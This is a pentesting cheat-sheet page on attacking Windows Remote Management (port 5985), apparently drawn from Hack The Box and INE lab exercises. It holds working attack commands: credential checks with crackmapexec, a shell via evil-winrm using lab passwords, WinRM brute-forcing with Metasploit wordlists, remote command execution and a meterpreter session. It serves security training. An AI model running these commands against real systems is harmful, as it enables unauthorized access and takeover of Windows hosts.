> For the complete documentation index, see [llms.txt](https://notes.cavementech.com/pentesting-quick-reference/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.cavementech.com/pentesting-quick-reference/port-5985-winrm.md).

# Port 5985 - WINRM

WinRM (Windows Remote Management) is a Windows-based service that enables administrators to remotely manage and execute commands on Windows machines. It's built on the WS-Management protocol, which is a standard web services protocol used for remote software and hardware management.

Let's check if we have access through winrm.

```
┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.161 -u "svc-alfresco" -p "s3rvice"  
SMB         10.10.10.161    5985   FOREST           [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP        10.10.10.161    5985   FOREST           [*] http://10.10.10.161:5985/wsman
WINRM       10.10.10.161    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
```

And we can exploit it. So, lets get the shell.

```
┌──(kali㉿kali)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.161 -u "svc-alfresco" -p "s3rvice" 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 
```

### WINRM Bruteforcing

```
msfconsole -q
use auxiliary/scanner/winrm/winrm_login
set RHOSTS demo.ine.local
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set PASSWORD anything
exploit
```

Note: We are setting the PASSWORD because in the recent version of the "winrm\_login" module, the PASSWORD option is required unless using Kerberos authentication. Metasploit will still use the USERPASS\_FILE file.

<figure><img src="/files/VgyuLqLalx20IWo6vYvk" alt=""><figcaption></figcaption></figure>

#### Checking WinRM supported authentication method&#x20;

This is very important to know, before we try to connect to the WinRM service. We need to use a valid authentication method while connecting to the service. You can find more information about the authentication from the below link: <https://docs.microsoft.com/en-us/windows/win32/winrm/authentication-for-remote-connections>

**Commands:**

```
use auxiliary/scanner/winrm/winrm_auth_methods
set RHOSTS demo.ine.local
exploit
```

<figure><img src="https://assets.ine.com/lab/learningpath/380496f1343b96af23c4dea35fe673a5642e8c9a4c4f9859d4ee2cd5659bf869.jpg" alt=""><figcaption></figcaption></figure>

Target supports two authentication types i.e Basic and Negotiate.

#### &#x20;Execute command on the target server using winrm\_cmd module.

**Commands:**

```
use auxiliary/scanner/winrm/winrm_cmd
set RHOSTS demo.ine.local
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
exploit
```

<figure><img src="https://assets.ine.com/lab/learningpath/2c0e2801120e6b8ae2e84fc77e8cef101f23bcfd770cfbf2e4a0d6561221d22c.jpg" alt=""><figcaption></figcaption></figure>

We have successfully executed the command “whoami” on the remote server.&#x20;

#### winrm\_script\_exec exploit module

Now, we will use the winrm\_script\_exec exploit module to get the meterpreter shell.

**Commands:**

```
use exploit/windows/winrm/winrm_script_exec
set RHOSTS demo.ine.local
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit
```

<figure><img src="https://assets.ine.com/lab/learningpath/c72034279447c23766737fbd21b8f0eb77382001474a0af62d2ad733bd747dcb.jpg" alt=""><figcaption></figcaption></figure>

<figure><img src="https://assets.ine.com/lab/learningpath/a2aecf9d33fefe4a933e80615874293e8e9a3834d2f83e702a3ba47af4c266f8.jpg" alt=""><figcaption></figcaption></figure>

We have gained the meterpreter session.
